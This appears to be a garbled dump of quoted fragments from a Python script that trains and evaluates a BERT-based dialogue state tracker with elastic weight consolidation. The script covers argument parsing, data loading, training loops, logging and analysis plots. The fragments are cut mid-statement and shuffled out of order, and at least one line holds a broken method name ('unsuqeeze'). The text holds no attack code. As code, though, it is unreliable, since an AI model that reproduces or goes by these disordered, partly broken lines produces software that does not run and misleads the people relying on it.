layers\") parser.add_argument('--zero_init_rnn', action='store_true',", "for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info)", "should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import", "'#': # ignore comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor):", "map_location=device) del_list = [] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup'", "distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int,", "batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len,", "help=\"The metric for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total", "for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0,", "want to set the label encoder trainable. \\n\" \"This option is valid only", "tokenizer, device): features = [] for label in labels: label_tokens = [\"[CLS]\"] +", "get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1: try:", "nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid,", "'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else:", "* ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)", "name of the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\")", "logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data", "word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids =", "parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to train: bert, bert-gru,", "'\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name", "% max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len=", "model that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for", "in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel')", "pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb", "args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for", "logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev", "in incorrect_dialogs: for turn in dialog: text = turn['input'] + '\\t' for label,", "output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have fine-tuned", "if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include", "ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count", "[0] * max_seq_length all_padding_len = [0, 0] max_turn = 0 for (ex_index, example)", "tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train: train_examples", "static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test", "n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze:", "this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this", "up to the sequence length. input_ids += [0] * (max_seq_length - len(input_ids)) #", "/ warmup return 1.0 - x ############################################################################### # Main ############################################################################### def main(): parser", "\" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx =", "and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim,", "if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError:", "input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0)", "+= '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer:", "trained slots in previous tasks class DataProcessor(object): \"\"\"Base class for data converters for", "class_acc) ) slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1)", "in enumerate(labels)} for labels in label_list] for i, label in enumerate(label): label =", "model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids,", "args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from", "#target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots", "output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated:", "args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\")", "for the training and dev sets.\"\"\" prev_dialogue_index = None examples = [] for", "slot))) plt.close() if not acc == 1: dialog = [] for input, label,", "zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in", "args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda", "learning rate with special warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step", "all_input_len, all_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader =", "guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn", "prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc +=", "Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs),", "apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install", "num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1):", "prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval()", "summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step)", "to improve fp16 numeric stability. Only used when fp16 set to True.\\n\" \"0", "SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler)", "accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps", "(label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for turn in", "ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True,", "and line[0][0] == '#': # ignore comments (starting with '#') continue lines.append(line) return", "# Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels", "val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results'", "list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task # tokenizer vocab_dir =", "zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text = {} text['input'] =", "input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps == 0: #", "# Zero-pad up to the sequence length. input_ids += [0] * (max_seq_length -", "logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot =", "prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot", "if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a = line[2] text_b =", "%d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data", "help=\"Set this flag if you want to set the label encoder trainable. \\n\"", "acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot =", "torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10,", "return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file", "eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy", "Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\"", "name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn", "TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded", "% slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace('", "SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam", "%s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if", "sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs =", "val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0))", "summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\",", "fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn):", "summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for", "text_b=None, label=None, prev_label=None): self.guid = guid self.text_a = text_a self.text_b = text_b self.label", "in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for", "last_update + args.patience <= epoch: if last_update + args.patience <= epoch: break ###############################################################################", "prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc,", "'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for", "= json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all':", "fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24',", "\\n\" \"Sequences longer than this will be truncated, and sequences shorter \\n\" \"than", "= TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)", "enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation", "model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel", "further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear learning rate", "logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x", "RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ##", "default='', type=str, required=True, help=\"Target slot idx to train model. ex. '0:1:2 or an", "is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx =", "nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for", "Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length,", "= %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps =", "elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots:", "ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len", "= min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example) in enumerate(examples):", "target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu ==", "# Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you", "torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y,", "+= [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)", "= 0 for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn =", "val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file", "eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0]", "0 last_update = None best_loss = None #### EWC: calculate Fisher ewc =", "+= nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc,", "ValueError(\"At least one of `do_train` or `do_eval` must be True.\") ############################################################################### # Load", "have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys():", "best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" %", "do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)", "= torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in", "prev_dialogue_index = line[0] else: # The symbol '#' will be replaced with '[SEP]'", "for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int,", "prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None or dev_loss <", "logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) #", "* num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn", "eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device),", "from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from", "= class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels += 1", "for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id", "is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\",", "device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\"", "lines = [] for line in reader: if len(line) > 0 and line[0][0]", "Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ %", "max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn))", "= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank", "of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to", "in del_list: del ptr_model[key] if n_gpu > 1: model = model.module state =", "prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot, _ =", "f in features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids =", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0)", "the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise", "args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else:", "embeddings label_token_ids, label_len = [], [] for labels in label_list: token_ids, lens =", "len(input_ids)) # Note: padding idx = 0 assert len(input_ids) == max_seq_length label_id, label_info", "= os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(),", "l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot", "pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\")", "in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train() tr_loss =", "args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ =", "== 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0,", "loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu", "if last_update is None or dev_loss < best_loss: # Save a trained model", "label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' % (label, label_map[i][label]) return label_id,", "True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss", "1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1))", "in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file", "bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer =", "-1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please", "input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot = label_ids.size(2) for slot", "in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])]", "in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0, 'lr':", "class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc", "def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item()", "nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot =", "optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer,", "pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt", "= \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss", "import logging import argparse import random import collections import operator from tqdm import", "if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\")", "class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels += 1 else:", "= model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [],", "default=\"cosine\", help=\"The metric for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int,", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc =", "/= nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot", "ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16", "prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3]", "dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step)", "max_length): \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\" while True:", "num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss", "% (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is", "[] for line in reader: if len(line) > 0 and line[0][0] == '#':", "= %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev", "and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] #", "torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len,", "= torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item()", "enumerate(labels)} for labels in label_list] for i, label in enumerate(label): label = _hard_coding_label(label)", "***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if", "utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence", "'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer if", "args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch", "text_b else: text_a = line[2] # line[2]: user utterance text_b = line[3] #", "for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels", "not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum", "and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists and is not", "\"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")),", "tokenization. \\n\" \"Sequences longer than this will be truncated, and sequences shorter \\n\"", "> 0 and line[0][0] == '#': # ignore comments (starting with '#') continue", "label = [ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for", "\"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence", "different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = []", "zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss", "for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" %", "\" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x", "def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in labels: label_tokens", "num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc /", "+= loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) %", "text_b = line[3] + \" # \" + text_b else: text_a = line[2]", "% total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__ == \"__main__\":", "\" + text_b else: text_a = line[2] # line[2]: user utterance text_b =", "when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between", "scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args", "prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss =", "be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32,", "i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot", "= %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and", "loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for", "dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0]", "all_prev_label_ids = 